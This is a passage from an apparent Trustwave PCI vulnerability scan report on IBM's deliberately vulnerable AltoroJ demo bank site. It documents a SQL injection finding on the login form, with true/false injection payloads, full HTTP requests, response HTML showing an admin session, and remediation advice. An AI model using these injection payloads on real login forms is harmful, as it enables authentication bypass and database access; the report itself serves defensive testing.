<option value="4485983356242217" >4485983356242217 Credit
Card</option>

</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 82 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</td></tr></table></span></td>
</tr>
</table>
</form>

</div>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 83 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->
False Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 84 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:37:44 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 85 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<div id="header" style="margin-bottom:5px; width: 99%;">
<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 86 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 87 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink5"
href="index.jsp?content=personal_investments.htm">Investments
&amp; Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"
href="index.jsp?content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10"
href="index.jsp?content=business_insurance.htm">Insurance</a></li
>
<li><a id="MenuHyperLink11"
href="index.jsp?content=business_retirement.htm">Retirement</a><
/li>
<li><a id="MenuHyperLink12"
href="index.jsp?content=business_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink3" class="subheader"


href="index.jsp?content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 88 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 89 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 90 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 91 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 92 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

6 SQL Injection Vulnerability 7.5 High Fail URL: https://demo.testfire.net/doLogin


Port: tcp/443

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 93 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net/doLogin HTTP/1.1
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 94 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6755
Date: Tue, 06 Aug 2019 04:31:39 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 95 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 96 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">


<!-- MEMBER TOC BEGIN -->

<table cellspacing="0" width="100%">

<td valign="top" class="cc br bb">


<br style="line-height: 10px;"/>
<b>I WANT TO ...</b>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="/bank/main.jsp">View
Account Summary</a></li>
<li><a id="MenuHyperLink2" href="/bank/transaction.jsp"
>View Recent Transactions</a></li>
<li><a id="MenuHyperLink3" href="/bank/transfer.jsp"
>Transfer Funds</a></li>
<!-- <li><a id="MenuHyperLink3" href="
/bank/stocks.jsp">Trade Stocks</a></li>-->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 97 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<li><a id="MenuHyperLink4" href="/bank/queryxpath.jsp"


>Search News Articles</a></li>
<li><a id="MenuHyperLink5" href="/bank/customize.jsp"
>Customize Site Language</a></li>
</ul>

<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>

</ul>
</span>

</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">

<div class="fl" style="width: 99%;">

<h1>Hello Admin User


</h1>

<p>
Welcome to Altoro Mutual Online.
</p>

<form name="details" method="get" action="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 98 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
showAccount">
<table border="0">
<TR valign="top">
<td>View Account Details:</td>
<td align="left">
<select size="1" name="listAccounts" id="
listAccounts">
<option value="800000" >800000
Corporate</option>
<option value="800001" >800001 Checking</option>
<option value="800002" >800002 Savings</option>
<option value="800003" >800003 Checking</option>
<option value="800004" >800004 Savings</option>
<option value="800005" >800005 Checking</option>
<option value="800006" >800006 Savings</option>
<option value="800007" >800007 Checking</option>
<option value="4539082039396288" >4539082039396288 Credit
Card</option>
<option value="4485983356242217" >4485983356242217 Credit
Card</option>
<option value="800008" >800008 Savings</option>

</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 99 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>

</div>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 100 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->
False Request: POST https://demo.testfire.net/doLogin HTTP/1.1
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 101 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:31:39 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 102 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 103 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
